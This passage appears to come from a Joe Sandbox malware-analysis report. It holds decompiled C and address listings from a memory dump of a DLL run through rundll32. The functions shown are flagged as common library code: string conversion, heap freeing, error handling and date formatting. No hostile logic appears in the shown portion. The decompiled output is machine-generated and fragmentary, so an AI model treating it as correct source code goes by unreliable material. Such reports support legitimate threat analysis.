										_t71 = E6E242281();
										_t111 = _t111 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t107 = _v44;
											_t103 =  *(_t107 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t107 + 8), _t111, _t73, 1,  &_v16, _t103, _t111,  &_v20);
											_t93 = _a12;
											_t106 = _t74;
											if(_t106 == 0 || _v20 != _t111 || _t106 < 0 || _t106 > 5) {
												goto L55;
											}
											if(_t106 + _t110 > _t93) {
												goto L56;
											}
											_t76 = _t111;
											_v32 = _t76;
											if(_t106 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t110 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
												 *((char*)(_t105 + _t110)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t110 = _t110 + 1;
												_v32 = _t76;
												if(_t76 < _t106) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t111) {
									goto L45;
								}
								_t28 = _t110 - 1; // -1
								_t111 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t111 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, _t91, _t98, _t91, _t111,  &_v20);
								if(_t111 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t111 - 1] == 0) {
										_t111 = _t111 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t109;
							_v24 = _t91;
							while( *_t83 != _t111) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t111 &&  *_t83 == _t111) {
								_t91 = (_t83 - _t109 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						_t106 = 0xff;
						while( *_t109 <= _t106) {
							_t98[_t111] =  *_t109;
							_t85 =  *_t109;
							_t109 =  &(_t109[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t111 = _t111 + 1;
							if(_t111 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E6E242281())) = 0x16;
					E6E24215B();
					goto L59;
				} else {
					L59:
					return E6E21F8A5(_v8 ^ _t112, _t106, _t111);
				}
			}

0x6e254e2a
0x6e254e32
0x6e254e39
0x6e254e3c
0x6e254e40
0x6e254e44
0x6e254e46
0x6e254e49
0x6e254e4d
0x6e254e50
0x6e254e55
0x6e254e64
0x6e254e84
0x6e254e89
0x6e254e8e
0x6e25502b
0x6e255034
0x6e255066
0x6e25506e
0x6e25507a
0x6e25507a
0x6e25507f
0x6e255082
0x00000000
0x6e255075
0x6e255075
0x6e255075
0x6e255088
0x6e25508c
0x6e255091
0x6e255091
0x00000000
0x6e255098
0x6e25506e
0x6e255036
0x6e25503c
0x6e255054
0x6e255054
0x00000000
0x6e255054
0x6e25503e
0x6e255043
0x6e255048
0x6e25504b
0x6e25504c
0x6e255052
0x00000000
0x00000000
0x00000000
0x6e255052
0x00000000
0x6e255043
0x6e254e94
0x6e254e9d
0x6e254ed7
0x6e254f50
0x6e254f54
0x6e254f6a
0x6e25501b
0x6e25501b
0x6e255020
0x6e255023
0x00000000
0x6e254f7f
0x6e254f81
0x00000000
0x00000000
0x6e254f87
0x6e254f8a
0x6e254f8a
0x6e254f8d
0x6e254f93
0x6e254f97
0x6e254f97
0x6e254fa9
0x6e254faf
0x6e254fb2
0x6e254fb6
0x00000000
0x00000000
0x6e254fdb
0x00000000
0x00000000
0x6e254fe1
0x6e254fe3
0x6e254fe8
0x6e255008
0x6e25500b
0x6e25500e
0x6e255013
0x00000000
0x00000000
0x00000000
0x6e255019
0x6e254fea
0x6e254fed
0x6e254fed
0x6e254ff1
0x6e254ff6
0x00000000
0x00000000
0x6e254fff
0x6e255000
0x6e255001
0x6e255006
0x00000000
0x00000000
0x00000000
0x6e255006
0x00000000
0x6e254fed
0x00000000
0x6e254f8a
0x6e254f6a
0x6e254f59
0x00000000
0x00000000
0x6e254f5f
0x6e254f5f
0x00000000
0x6e254f5f
0x6e254edb
0x6e254f01
0x6e254f14
0x6e254f18
0x00000000
0x6e254f28
0x6e254f30
0x6e254f36
0x6e254f36
0x00000000
0x6e254f30
0x6e254f18
0x6e254edd
0x6e254edf
0x6e254ee2
0x6e254ee7
0x6e254eea
0x6e254eea
0x6e254eee
0x00000000
0x00000000
0x00000000
0x6e254eee
0x6e254ef3
0x6e254f00
0x6e254f00
0x00000000
0x6e254ef3
0x6e254ea1
0x00000000
0x00000000
0x6e254ea7
0x6e254eac
0x6e254eb7
0x6e254eba
0x6e254ebd
0x6e254ec3
0x00000000
0x00000000
0x6e254ec9
0x6e254ecc
0x00000000
0x00000000
0x00000000
0x6e254ece
0x00000000
0x6e254eac
0x6e254e6b
0x6e254e71
0x00000000
0x6e254e5b
0x6e25509a
0x6e2550aa
0x6e2550aa

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cff7e6b42445d244d725beb47306ff76b229cee0c96ee1837fb5ad38148bb758
Instruction ID: 52c41d5498e631e222ba9415a4411c17bf8912b07e00d30bfb53408d903723fb
Opcode Fuzzy Hash: cff7e6b42445d244d725beb47306ff76b229cee0c96ee1837fb5ad38148bb758
Instruction Fuzzy Hash: 7471D23195031F9BDB518BD9CA44AAFBB76EF49311F144629E82167380C7B18866CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E24A737, Relevance: 7.6, APIs: 5, Instructions: 129
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E6E24A737(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x6e2c506c; // 0x2b33ced3
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E6E241F1D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E6E21F8FA(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E6E21F8FA(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E6E21F8FA(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E6E25AC0E(_t56);
						_t40 = E6E24CBD3(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E6E25AC0E(_t56);
						E6E24CBD3(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x6e2c506c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x6e24a737
0x6e24a741
0x6e24a745
0x6e24a747
0x6e24a74b
0x6e24a755
0x6e24a766
0x6e24a76b
0x6e24a76d
0x6e24a76f
0x6e24a771
0x6e24a773
0x6e24a777
0x6e24a831
0x6e24a83f
0x6e24a841
0x6e24a846
0x6e24a84d
0x6e24a84f
0x6e24a85d
0x6e24a86c
0x6e24a86f
0x6e24a871
0x00000000
0x6e24a872
0x6e24a77f
0x6e24a784
0x6e24a789
0x6e24a78b
0x6e24a78b
0x6e24a78d
0x6e24a792
0x6e24a796
0x6e24a796
0x6e24a799
0x6e24a7b8
0x6e24a7b8
0x6e24a7ba
0x6e24a7bd
0x6e24a7c6
0x6e24a7c9
0x6e24a7ce
0x6e24a7d1
0x6e24a7d6
0x00000000
0x00000000
0x6e24a7d8
0x00000000
0x6e24a79b
0x6e24a79b
0x6e24a79d
0x6e24a7a6
0x6e24a7a9
0x6e24a7ae
0x6e24a7b1
0x6e24a7b6
0x6e24a7e0
0x6e24a7e3
0x6e24a7e5
0x6e24a7e8
0x6e24a7f0
0x6e24a7f6
0x6e24a7fd
0x6e24a7ff
0x6e24a807
0x6e24a816
0x6e24a81a
0x6e24a81c
0x6e24a81f
0x00000000
0x00000000
0x6e24a821
0x6e24a824
0x6e24a826
0x6e24a826
0x6e24a827
0x6e24a829
0x6e24a82c
0x00000000
0x6e24a826
0x00000000
0x6e24a7b6
0x6e24a799
0x00000000

APIs

_free.LIBCMT ref: 6E24A7A9
_free.LIBCMT ref: 6E24A7C9

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 93a1171403b985d84c24c764a6c40519fbad89df573776ca03f0932c9853bc36
Instruction ID: 3f7f4bc7bcf24339a14b48fcccea091df010d716c30d5fa0513ad6727c82625c
Opcode Fuzzy Hash: 93a1171403b985d84c24c764a6c40519fbad89df573776ca03f0932c9853bc36
Instruction Fuzzy Hash: 9541A276E40208DFDB14CFA8C885A9EB7F6EF89714B254569D915EB241E731E902CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E24D683, Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E6E24D683(void* __ecx, void* __edx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x6e2c51e4; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E6E24C7EF(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E6E254196(_t13, __eflags,  *0x6e2c51e4, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E6E24D33F(_t13, _t16, 0x6e2c76f0);
							E6E24CBD3(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E6E24CBD3();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E6E254140(_t11, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x6e24d683
0x6e24d68e
0x6e24d690
0x6e24d692
0x6e24d697
0x6e24d69a
0x6e24d6a8
0x6e24d6b4
0x6e24d6b7
0x6e24d6ba
0x6e24d6cc
0x6e24d6d1
0x6e24d6d3
0x6e24d6de
0x6e24d6e4
0x6e24d6ec
0x6e24d6ee
0x00000000
0x00000000
0x00000000
0x00000000
0x6e24d6d5
0x6e24d6d5
0x00000000
0x6e24d6d5
0x6e24d6bc
0x6e24d6bc
0x6e24d6bd
0x6e24d6bd
0x6e24d6f0
0x6e24d6f1
0x6e24d6f1
0x6e24d69c
0x6e24d6a2
0x6e24d6a6
0x6e24d6f9
0x6e24d6fa
0x6e24d700
0x00000000
0x00000000
0x00000000
0x6e24d6a6
0x6e24d707

APIs

GetLastError.KERNEL32(6E2075D9,6E2075D9,00000002,6E242286,6E24F2B0,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004), ref: 6E24D688
_free.LIBCMT ref: 6E24D6BD
_free.LIBCMT ref: 6E24D6E4
SetLastError.KERNEL32(00000000,?,6E2075D9), ref: 6E24D6F1
SetLastError.KERNEL32(00000000,?,6E2075D9), ref: 6E24D6FA

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 64a38392eb3f5ecfff56bd5fa690bb399f5707403252c94e0463de91948606bd
Instruction ID: 9d6dd68942a56b49741f1a5482711501c10d2b951223f683445f59e11dc200fb
Opcode Fuzzy Hash: 64a38392eb3f5ecfff56bd5fa690bb399f5707403252c94e0463de91948606bd
Instruction Fuzzy Hash: C001FE7A18490AEBD34916F9EC4DE5B273F9BC37767244525F41D96240EFF488018974

Uniqueness

Uniqueness Score: -1.00%

Function 6E25CCC3, Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6E25CCC3(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6e2c50b8; // 0x6e2c50b0
					if(_t23 != 0) {
						E6E24CBD3(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6e2c50bc; // 0x6e2c7248
					if(_t24 != 0) {
						E6E24CBD3(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6e2c50c0; // 0x6e2c7248
					if(_t25 != 0) {
						E6E24CBD3(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6e2c50e8; // 0x6e2c50b4
					if(_t26 != 0) {
						E6E24CBD3(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6e2c50ec; // 0x6e2c724c
					if(_t27 != 0) {
						return E6E24CBD3(_t6);
					}
				}
				return _t6;
			}

0x6e25ccc9
0x6e25ccce
0x6e25ccd2
0x6e25ccd8
0x6e25ccdb
0x6e25cce0
0x6e25cce4
0x6e25ccea
0x6e25cced
0x6e25ccf2
0x6e25ccf6
0x6e25ccfc
0x6e25ccff
0x6e25cd04
0x6e25cd08
0x6e25cd0e
0x6e25cd11
0x6e25cd16
0x6e25cd17
0x6e25cd1a
0x6e25cd20
0x00000000
0x6e25cd28
0x6e25cd20
0x6e25cd2b

APIs

_free.LIBCMT ref: 6E25CCDB

Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB

_free.LIBCMT ref: 6E25CCED
_free.LIBCMT ref: 6E25CCFF
_free.LIBCMT ref: 6E25CD11
_free.LIBCMT ref: 6E25CD23

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 685797e0a0a6de1c9222722fa9164a7faec82c90f1716fc1e6bcddce8dfa7dd2
Instruction ID: e23053e84b8e6bb67568be27089eec695c5d5f401943e04cc8de466a4227d7f5
Opcode Fuzzy Hash: 685797e0a0a6de1c9222722fa9164a7faec82c90f1716fc1e6bcddce8dfa7dd2
Instruction Fuzzy Hash: 50F04435441A0ED7CA94CBD8E5CAC5B37EFBA09E117704C05E065EF601E774F8948AE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E247D8A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E6E247D8A(void* __ebx, signed int __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v33;
				signed int** _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				void* _v64;
				void* __esi;
				signed int _t86;
				intOrPtr _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				signed int _t110;
				void* _t111;
				signed int _t116;
				signed int _t117;
				signed int _t129;
				void* _t133;
				signed int _t135;
				intOrPtr _t143;
				signed short* _t144;
				intOrPtr _t145;
				signed int** _t146;
				signed int _t147;
				signed int* _t148;
				signed int _t149;
				signed int _t152;
				signed short** _t154;
				signed int _t155;
				signed int _t159;
				signed int _t163;
				intOrPtr* _t171;
				signed short _t172;
				signed short* _t173;
				signed int** _t174;
				void* _t175;
				signed short* _t178;
				intOrPtr* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int** _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;

				_t149 = __ecx;
				_t86 =  *0x6e2c506c; // 0x2b33ced3
				_v8 = _t86 ^ _t184;
				_t171 = _a12;
				_v52 = _a4;
				_t143 = _a24;
				_v40 = _a16;
				_v48 = _t171;
				_v44 = _t143;
				_t181 = _a20;
				_v32 = _t181;
				_t91 = _a8;
				if(_t91 == 0) {
					_t178 =  *(_t143 + 0x154);
				} else {
					if(_t91 == 1) {
						_t178 =  *(_t143 + 0x158);
					} else {
						_t178 =  *(_t143 + 0x15c);
					}
				}
				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
					goto L113;
				} else {
					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
					_v33 = _t163;
					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
					_v18 =  *((intOrPtr*)(_t171 + 0xc));
					_v16 =  *((intOrPtr*)(_t171 + 8));
					_v14 =  *((intOrPtr*)(_t171 + 4));
					_v12 =  *_t171;
					_v10 = 0;
					_t191 = _t163;
					if(_t163 == 0) {
						__eflags = 0;
						_t129 = E6E2541EF(0, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t178, 0, 0, 0);
					} else {
						_t129 = E6E2543E3(0, _t191,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t178, 0, 0);
					}
					_t147 = _t129;
					if(_t147 == 0) {
						goto L113;
					} else {
						_t175 = _t147 + _t147;
						_t165 = _t175 + 8;
						asm("sbb eax, eax");
						if((_t175 + 0x00000008 & _t129) == 0) {
							_t181 = 0;
							__eflags = 0;
							L18:
							_v28 = _t181;
							if(_t181 == 0) {
								L30:
								E6E20DEE1(0);
								_t181 = _v32;
								while(1) {
									L113:
									_t172 =  *_t178 & 0x0000ffff;
									__eflags = _t172;
									if(_t172 == 0) {
										break;
									}
									__eflags =  *_t181;
									if( *_t181 == 0) {
										L28:
										L29:
										return E6E21F8A5(_v8 ^ _t184, _t172, _t181);
									}
									_v32 = 0;
									_t152 = 0;
									__eflags = 0;
									_v28 = _t178;
									_t144 = _t178;
									_t94 = _t172 & 0x0000ffff;
									do {
										_t144 =  &(_t144[1]);
										_t152 = _t152 + 1;
										__eflags =  *_t144 - _t94;
									} while ( *_t144 == _t94);
									_t95 = _t172 & 0x0000ffff;
									_v28 = _t144;
									_t145 = _v44;
									__eflags = _t95 - 0x64;
									if(__eflags > 0) {
										_t96 = _t95 - 0x68;
										__eflags = _t96;
										if(_t96 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L110:
												_push(0x49);
												L111:
												_pop(_t97);
												_t98 = E6E247154(_t145, _t153, _t178, _v52, _t97, _v48, _v40, _t181, _t145, _v32);
												_t185 = _t185 + 0x1c;
												__eflags = _t98;
												if(_t98 == 0) {
													 *((intOrPtr*)(E6E242281())) = 0x16;
													goto L29;
												}
												L112:
												_t178 = _v28;
												continue;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L110;
											}
											L108:
											_t154 = _v40;
											_t178 =  &(_t178[1]);
											 *( *_t154) = _t172;
											 *_t154 =  &(( *_t154)[1]);
											 *_t181 =  *_t181 - 1;
											continue;
										}
										_t102 = _t96 - 5;
										__eflags = _t102;
										if(_t102 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L105:
												_push(0x4d);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L105;
											}
											goto L108;
										}
										_t103 = _t102 - 6;
										__eflags = _t103;
										if(_t103 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L100:
												_push(0x53);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L100;
											}
											goto L108;
										}
										_t104 = _t103 - 1;
										__eflags = _t104;
										if(_t104 == 0) {
											_t105 = _v48;
											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
												_t173 =  *(_t145 + 0x150);
											} else {
												_t173 =  *(_t145 + 0x14c);
											}
											__eflags = _t152 - 1;
											if(_t152 != 1) {
												L91:
												_t155 =  *_t173 & 0x0000ffff;
												__eflags = _t155;
												if(_t155 == 0) {
													goto L112;
												}
												_t146 = _v40;
												while(1) {
													__eflags =  *_t181;
													if( *_t181 <= 0) {
														goto L112;
													}
													_t173 =  &(_t173[1]);
													 *( *_t146) = _t155;
													 *_t146 =  &(( *_t146)[0]);
													 *_t181 =  *_t181 - 1;
													_t155 =  *_t173 & 0x0000ffff;
													__eflags = _t155;
													if(_t155 != 0) {
														continue;
													}
													goto L112;
												}
											} else {
												__eflags =  *_t181;
												if( *_t181 <= 0) {
													goto L91;
												}
												_t179 = _v40;
												 *((short*)( *_t179)) =  *_t173;
												 *_t179 =  *_t179 + 2;
												 *_t181 =  *_t181 - 1;
											}
											goto L112;
										}
										__eflags = _t104 != 5;
										if(_t104 != 5) {
											goto L108;
										}
										_t153 = _t152;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x79);
											goto L111;
										}
										_t153 = _t153;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x59);
										goto L111;
									}
									if(__eflags == 0) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L75:
											_push(0x64);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L75;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x61);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x41);
										goto L111;
									}
									__eflags = _t95 - 0x27;
									if(_t95 == 0x27) {
										_t110 = _t152 & 0x80000001;
										__eflags = _t110;
										if(__eflags < 0) {
											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
										}
										_t178 =  &(_t178[_t152]);
										if(__eflags == 0) {
											_t159 =  *_t178 & 0x0000ffff;
											__eflags = _t159;
											if(_t159 == 0) {
												goto L28;
											}
											_t174 = _v40;
											while(1) {
												__eflags =  *_t181;
												if( *_t181 == 0) {
													goto L113;
												}
												_t111 = 0x27;
												_t178 =  &(_t178[1]);
												__eflags = _t159 - _t111;
												if(_t159 == _t111) {
													goto L113;
												}
												 *( *_t174) = _t159;
												 *_t174 =  &(( *_t174)[0]);
												 *_t181 =  *_t181 - 1;
												_t159 =  *_t178 & 0x0000ffff;
												__eflags = _t159;
												if(_t159 != 0) {
													continue;
												}
												goto L113;
											}
										}
										continue;
									}
									__eflags = _t95 - 0x41;
									if(_t95 == 0x41) {
										L41:
										_t116 = E6E25806D(_t145, _t178, _t181, _t178, L"am/pm");
										__eflags = _t116;
										if(_t116 != 0) {
											_t117 = E6E25806D(_t145, _t178, _t181, _t178, L"a/p");
											_pop(_t153);
											__eflags = _t117;
											if(_t117 == 0) {
												_v28 =  &(_t178[3]);
											}
										} else {
											_t153 =  &(_t178[5]);
											_v28 =  &(_t178[5]);
										}
										_push(0x70);
										goto L111;
									}
									__eflags = _t95 - 0x48;
									if(_t95 == 0x48) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L55:
											_push(0x48);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L55;
										}
										goto L108;
									}
									__eflags = _t95 - 0x4d;
									if(_t95 == 0x4d) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L50:
											_push(0x6d);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L50;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x62);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x42);
										goto L111;
									}
									__eflags = _t95 - 0x61;
									if(_t95 != 0x61) {
										goto L108;
									}
									goto L41;
								}
								goto L28;
							}
							_t200 = _v33;
							if(_v33 == 0) {
								_t133 = E6E2541EF(_t165, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t178, _t181, _t147, 0);
							} else {
								_t133 = E6E2543E3(_t165, _t200,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t178, _t181, _t147);
							}
							_t180 = _t181;
							_t172 = _t133 - 1;
							if(_t172 <= 0) {
								L27:
								E6E20DEE1(_t181);
								goto L28;
							} else {
								_t148 = _v32;
								_t182 = _v40;
								while( *_t148 > 0) {
									_t135 =  *_t180;
									_t180 =  &(_t180[0]);
									 *( *_t182) = _t135;
									 *_t182 =  &(( *_t182)[0]);
									 *_t148 =  *_t148 - 1;
									_t172 = _t172 - 1;
									if(_t172 > 0) {
